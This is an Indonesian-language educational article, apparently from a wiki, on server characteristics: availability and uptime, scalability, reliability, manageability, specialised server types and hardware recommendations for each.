Availibility maksudnya adalah : sebuah server harus mampu selalu tersedia “melayani” user/client secara terus menerus, yang di-istilahkan dengan 24-jam x 7 hari seminggu. Server juga seharusnya hanya memiliki sedikit “Fault-Tolerant”, yaitu gangguan yang menyebabkan downtime (kegagalan sistem server).Jadi dapat disimpulkan karakter availibility merupakan kemampuan server untuk merespon segala hal permintaan user kapan-pun waktunya.
Fault-tolerant dan downtime merupakan istilah yang sering digunakan pada server.Keduanya memiliki rumus (formula) tertentu yang diartikan sebagai jumlah waktu beroperasi server selama satu tahun tanpa gangguan.Ini dapat dihitung menggunakan rumus “Percent Uptime”, yaitu jumlah angka sembilan pada nilai “percent uptime”. Contoh : Rata-rata sebuah server A memiliki percent uptime sebanyak 99,999% (memiliki total angka 9 sebanyak 5 buah) yang sama dengan 5,26 menit setahun. Artinya diasumsikan server tersebut mengalami gangguan berkisar 5,26 menit / tahun, dengan jumlah hari setahun adalah 365,25 hari.
Analogi : Pada mesin ATM 24-jam kita dapat melakukan berbagai transaksi perbankan yang kita butuhkan, seperti mengambil uang kontan, transfer, membayar tagihan dan lain-lain selama 24 jam. Mesin ATM tidak mengenal kata libur dan berhenti, asal dioperasikan dan dirawat dengan sebagai mana mestinya.Mesin ATM juga selalu diawasi terus menerus oleh operator khusus agar selalu “available”.Inilah yang disebut dengan “Availibility”.
Scalability (Ketercakupan)
Definisi scalability adalah : sebuah server harus dapat ditingkatkan kemampuannya, yaitu dari sisi performa, fungsi & penambahan jumlah klien. Scalability dibagi menjadi dua, yaitu :
  • Scale-Up, yaitu kemampuan server untuk di-upgrade komponen & periferalnya (misal :Processor atau RAM) sehingga performa-nya secara keseluruhan akan meningkat dan waktu penggunaan (life-cyle) bisa lebih lama.
  • Scale-Out, yaitu kemampuan unit server untuk ditambah (misal dari satu menjadi tiga unit) agar beban kerja pemrosesannya dapat dibagi rata dan lebih optimal. Misalnya : sebuah perusahaan membuat memisahkan fungsi web e-commerce pada server (Web Server) terpisah dari serverdatabase-nya. Salah satu implementasi dari Scale-Out adalah pada server rackmount dan blade system yang akan diterangkan selanjutnya.
Analogi :
  • Bayangkan sebuah PC rakitan yang akan di-upgrade dengan HDD kapasitas lebih besar. Kemampuan PC tersebut untuk mengakomodasi HDD lebih dari satu unit dan kapasitas yang lebih besar berarti disebut “Scalability Scale-Up”
  • Pada sebuah mainan Lego (balok bersusun), maka kita bisa menambah balok-balok baru dengan bentuk tertentu sehingga secara keseluruhan akan membuat lego model baru. Ini salah satu contoh dari “Scalability Scale-Out”.
Struktur karakter sebuah server
http://opensource.telkomspeedy.com/wiki/skins/common/images/magnify-clip.png
Struktur karakter sebuah server
Lebih Jauh Mengenai Availability
Availability merupakan salah satu karakter server yang terpenting. Untuk menjamin sebuah server agar tetap “available” melayani user, maka ada beberapa hal yang mesti diperhatikan, yaitu :
  • Pastikan motherboardserver mendukung sistem redundant, yaitu fitur yang dapat membackup diri-nya sendiri ketika terjadi masalah. Contoh fitur redundant seperti pada modul Power SupplyServer. Ketika modul tersebut rusak yang akan menyebabkan pasokan daya terhenti, maka fungsinya digantikan oleh modul lain sebagai backup. Ini untuk menjamin server tetap mendapatkan daya dan bekerja sebagaimana mestinya.
  • Pastikan server memiliki komponen multiple (jumlahnya lebih dari satu), terutama untuk Cooling Fan pendingin. Ini dimaksudkan agar ketika salah satu komponen cooling fan gagal berfungsi, maka sistem aliran suhu akan tetap terjaga melalui cooling fan lainnya.
  • Pastikan sistem server juga mendukung instrument Hot Swap dan Hot Plug, yaitu peralatan yang dapat diganti (dicabut/pasang) tanpa perlu mematikan unit server.
  • Pastikan server didukung oleh infrastruktur power supply yang baik, seperti adanya Stabilizer (Stavolt) dan UPS (Uninteruptable Power Supply). Stabilizer berfungsi untuk menstabilkan tegangan listrik yang masuk (voltage) dan UPS berfungsi untuk menyimpan tenaga listrik agar ketika terjadi pemadaman mendadak, server tetap mendapatkan pasokan daya.
  • Pastikan sebuah server memiliki software manajemen yang dapat mengontrol seluruh aktivitas yang terjadi sehingga permasalahan data dideteksi dan ditangani lebih mudah.
Tabel Komponen dan fitur pendukung “Availability”
Komponen
Fitur
Keterangan
Power Supply
Redundant
2 unit power supply dalam satu modul
Hot Swap
Terdapat lebih dari satu unit pada sistem
Multiple Unit
Terdapat lebih dari satu unit pada sistem
Terdapat lebih dari satu unit, umumnya dengan RAID
Interface SATA atau SAS
Floppy Disk USB
Hot Plug
Eksternal via USB port
Disc Driver USB
Hot Plug
Eksternal via USB port
Redundant / RAID support
Mendukung fitur redundant &RAID pada menu BIOS

Selain itu, karakter availability juga ditunjang oleh tiga faktor utama (sub-karakter) :
  • Serviceability (Penanganan Masalah) -Ketika mengalami masalah / gangguan, sebuah server haruslah dapat diperbaiki dengan cepat dan mudah agar dapat beroperasi kembali. Penanganan masalah dapat dilakukan dengan dukungan customer support profesional, penggantian suku-cadang, sistem internal server yang benar dan lain-lain. Ukuran yang sering dipakai pada serviceability adalah MTTR (Mean Time to Repair), yaitu waktu rata-rata server mengalami perbaikan dalam kurun waktu tertentu.
  • Reliability (kehandalan) - Sebuah server haruslah memiliki kehandalan yang tinggi, mampu beroperasi non-stop 24-jam x 7-hari, tidak mengalami down-time (kerusakan atau kegagalan sistem), kompatibilitas tinggi terhadap software dan periferal pendukung eksternal, seperti Hub-Switch, Router, Access Point dan sebagainya.
Analogi : Bayangkan sebuah mobil Jeep yang mengarungi hutan dan sungai pada suatu lomba off-road. Umumnya mobil Jeep tahan banting, mampu bergerak di medan berair (sungai), tanjakan curam dan lubang besar. Kemampuan mobil Jeep pada kontur medan yang berat disebut sebagai “Reliability” (kehandalan). Ukuran yang sering dipakai pada reliability adalah MTTF (Mean Time to Failure), yaitu waktu rata-rata server mengalami kegagalan/kerusakan dalam kurun waktu tertentu.
  • Manageability - Sebuah server harus mampu menangani berbagai elemen yang terkoneksi padanya, misalnya klien, sistem jaringan, koneksi internet dan sebagainya secara terintegrasi, termasuk menyediakan sistem trouble-shooting dan recovery yang memadai. Manageability merupakan salah satu tugas terpenting seorang Administrator Server dan Networking.
Analagi : Bayangkan sebuah kokpit pesawat terbang yang terdiri dari berbagai panel indikator dan tombol untuk menerbangkan pesawat. Seorang pilot bekerja hanya dengan menggerakkan lengan kemudi serta tombol-tombol yang tersedia untuk mengendalikan pesawat berbobot ratusan ton dengan kecepatan ratusan kilometer per-jam diatas udara. Itulah yang disebut Manageability.
 Apa perbedaan antara SuperComputer dan Server ?
SuperComputer bukanlah sebuah server, tapi lebih tepat dikategorikan sebagai Workstation kelas berat (Super High-End Workstation). SuperComputer bekerja untuk mengolah data masif, komputasi berkapasitas sangat besar lalu menghasilkan output dengan presisi tinggi, seperti pengolahan besaran Energi, Ramalan Cuaca/Iklim, pemetaan DNA dan susunan syaraf manusia, Film Multimedia, dan lain-lain.
SuperComputer terdiri dari ratusan bahkan ribuan komputerworktation (berfungsi khusus) yang dirangkai menjadi satu agar bekerja secara paralel.
Dari karakteristik tersebut telah terlihat bahwa fungsi Server dan SuperComputer sangat berbeda.Tapi fungsi keduanya bisa “bercampur”, dimana Server juga dapat menjadi mesin pengolah data atau komputasi dengan fungsi khusus, dan SuperComputer juga bisa menjadi server.
Bagaimana bisa “merasakan” ada sebuah server didekat kita ?
  • Bawa notebook dengan fasilitas Wifi ke sebuah Mal yang menyediakan fasilitas Hotspot. Hotspot merupakan area dimana kita bisa menerima koneksi internetnirkabel (wireless). Ketika terkoneksi internet, berarti ada server yang bekerja didekat kita.
  • Coba mainkan game internet di sebuah game-center online. Ketika kita me”mengotak-atik” musuh dalam game Counter-Strike, maka kita sebetulnya sedang merasakan sebuah server bekerja menghubungkan kita dengan pihak musuh.
  • Mengambil uang di ATM, mengakses informasi saldo atau melakukan transfer antar cabang. Saat kita melakukan aktivitas ini, sebetulnya saat itu kita menyuruh server bekerja memberikan informasi atau melakukan perintah transfer yang kita inginkan.
Masih banyak aktivitas lain yang menunjukkan sebuah server atau lebih sedang bekerja dibelakang kita, seperti ketika berkomunikasi via ponsel, aktivitas kasir di supermarket, menonton televisi kabel dan sebagainya.
Apakah mungkin sebuah Server diperlukan didalam rumah layaknya PC ?
Sangat mungkin. Saat ini dengan kebutuhan pengguna komputer yang semakin besar, juga dengan berkembangnya fungsi komputasi dan aplikasi berbasis multimedia, maka kita akan memerlukan server dirumah. Misalnya, saat ini Intel telah memproduksi platform PC rumahan yang disebut Intel ViiV yang menyatukan fungsi komputer, internet dan entertainment sekaligus.Intel ViiV berfungsi layaknya sebuah Server rumahan, karena dapat melayani berbagai klien yang terkoneksi padanya melalui sebuah Access Point.
Contoh lain lagi, saat ini umum anggota keluarga memiliki lebih dari satu PC dan Notebook, ditambah dengan berbagai handled devices, seperti PDA, Hand Phone, Kamera Digital, MP3/MP4 Player, Handy Cam dan lain-lain yang berbasis file digital. Semua perangkat ini menghasilkan output tertentu, seperti lagu, gambar, klip film dan sebagainya. Tentu saja output ini harus dikelola, agar dapat dilihat menggunakan peralatan lain (misal : foto hasil jepretan digital camera ditampilkan pada layar TV). Agar semua output dapat dikelola dengan baik, maka kita membutuhkan satu perangkat server rumah (home server). Perhatikan tabel dibawah :
Tabel Contoh perangkat Home Server dan fungsinya
Server Rumah
Deskripsi Fungsi
Home Theater
Pusat hiburan digital dirumah, seperti TV analog, TV Kabel, Film DVD, MP3 Player, Picture Viewer, berpadu dengan LCD Monitor dan Speaker berkualitas tinggi.
Multimedia Storage
Penyimpanan file digital, seperti Film, Klip Lagu, Foto, Game, dsb yang bersumber dari PC, Handled Device dan lainnya.
Internet Gateway
Sebagai komputer gateway internet yang mengkoneksikan klien rumah menggunakan LAN atau Wireless.
Digital Home Center
Mengkoneksikan berbagai peralatan elektronik (consumer) berbasis komputer, seperti Televisi, Kulkas, Air Conditioner, CCTV sampai Alarm rumah.
Apakah sebuah Server begitu canggihnya hingga mampu mengerjakan segala hal ?
Sebetulnya tidak semua hal dilakukan oleh sebuah server tunggal.Mengikuti perkembangan dan tuntutan zaman yang semakin kompleks, maka konfigurasi dan fungsi server juga ikut berubah.Saat ini lazim dalam satu infrastruktur organisasi memiliki beragam server dengan fungsi yang lebih fokus dan terspesialisasi.Server-server ini juga dapat dikoneksikan secara parallel dan melayani satu institusi organisasi secara bersamaan.
Contoh server dengan fungsi terspesialisasi :
  • Web Server (atau HTTP server) adalah server yang bertugas sebagai “wadah” atau didedikasikan pada sebuah konten web tertentu (misal : www.klikbca.com atau www.detik.com), sehingga user yang terkoneksi internet dapat mengakses berbagai konten informasi disana. Web Server digunakan pada sebuah situs yang memiliki hit tinggi (sering diakses), hingga diperlukan sebuah unit server terpisah (dedicated) agar “trafik akses” menjadi lancar. Perusahaan yang pengguna web server umumnya adalah Perbankan yang sudah menintegrasikan layanan internet (mobile banking), kantor berita online, penyedia email gratis berbasis web dan sebagainya.
  • Database Server (pusat basis data) adalah server yang mengolah, menyimpan dan mendistribusikan berbagai data kompleks yang dihasilkan oleh berbagai sumber. Umumnya database server merupakan “wadah” dari sebuah aplikasi ERP. Dengan Database Server, lalu lintas data tertata dengan baik, dapat diakses seketika (real-time), mengintegrasikan berbagai data berbeda dan lain-lain. Database Server digunakan oleh perusahaan dengan berbagai divisi dan cabang, perbankan, perpustakaan digital, dan sebagainya serta menggunakan sebuah software ERP/Database untuk mengintegrasikannya.


  • Application Server, merupakan server yang didekasikan untuk menjalankan berbagai aplikasi terpusat yang digunakan secara bersama-sama. Dengan server ini, maka setiap klien tidak perlu menginstal aplikasi tersebut di komputer masing-masing karena bisa dijalankan langsung melalui server. Server aplikasi biasanya digunakan pada perusahaan yang menjalankan aplikasi ERP.
  • Storage server, merupakan server yang dirancang untuk menyimpan berbagai data dalam jumlah besar. Server ini diperlukan untuk membatasi duplikasi data didalam storage dan mengatur agar data dapat diakses bersama (shared). Storage server memiliki sejumlah hard disk dengan kapasitas besar, dan dikonfigurasi dalam mode RAID (Redundat Array Independent Disk) agar data lebih aman dan mudah diakses. Mengenai RAID akan dibahas lebih lanjut dibagian lain. Contoh storage server adalah sebuah NAS (Network Attached Storage) dan NDAS (Network Direct Attached Storage), seperti produk Intel NAS SS400-E, NAS SSR212MC2 atau NDAS NetDisk Ximeta.
  • File Server (FTP Server) merupakan server yang menyediakan berbagai file-file yang diperlukan oleh klien, seperti Driver, Operating System, Office, Dokumen, dan lain-lain untuk di-instalasi pada masing-masing komputer. File tersebut dapat diakses melalui File Transfer Protocol via internet oleh masing-masing klien, sehingga menghemat ruang penyimpanan di PC Client.
  • Communications Server berfungsi sebagai “koordinator” sistem jaringan telekomunikasi yang menangani berbagai aplikasi seperti suara (voice), data, gambar atau data yang diakses melalui handset tertentu, seperti HP dan PDA. Server tersebut umum digunakan oleh perusahaan penyedia jasa telekomunikasi (operator), VOIP (Voice Over Internet Protocol), dan sebagainya.
Selain tipe server diatas, masih banyak lagi varian server berdasarkan fungsinya, seperti Game Server, Proxy Server, Fax Server dan lain-lain. Bahkan sebuah koneksi peer-to-peer juga akan menggunakan salah satu PC sebagai server.
Apakah masing-masing server spesialis tersebut memerlukan konfigurasi hardware dan software tersendiri juga ?
Tentu saja, setiap varian server memiliki karakteristik yang berbeda satu sama lain. Karakteristik tersebut meliputi konfigurasi hardware dan software yang digunakannya.Lihat tabel dibawah.
Tabel Rekomendasi kebutuhan Hardware terhadap spesialisasi server
Processor
Memory
Hard Disk
Web Server
Dual Processor atau lebih
Kapasitas besar
Kapasitas besar
Dual Core atau lebih
Empat Channel Mode
RAID 5 Mode
Cache Memory besar
FSB tinggi
SCSI atau SAS interface
FSB tinggi
Database Server
Dual Processor atau lebih
Kapasitas besar
Kapasitas besar
Cache Memory besar
Dual Channel Mode
RAID 5, 10
SCSI atau SAS interface
Application Server
Clock Speed tinggi
Kapasitas standar
Kapasitas besar
Dual Core atau lebih
Dual Channel Mode
RAID 0, 1
FSB tinggi
SATA atau SCSI interface
Storage Server
Spesifikasi standar (value)
Kapasitas besar
Kapasitas sangat besar
Dual Channel Mode
RAID 5, 10
SATA interface
File Server
Spesifikasi standar (value)
Kapasitas standar
Kapasitas besar
Dual Channel Mode
RAID 0, 1
SATA interface
Communications Server
Dual Processor atau lebih
Kapasitas besar
Kapasitas besar
Dual Core atau lebih
Empat Channel Mode
RAID 5, 10
Cache Memory besar
SCSI atau SAS interface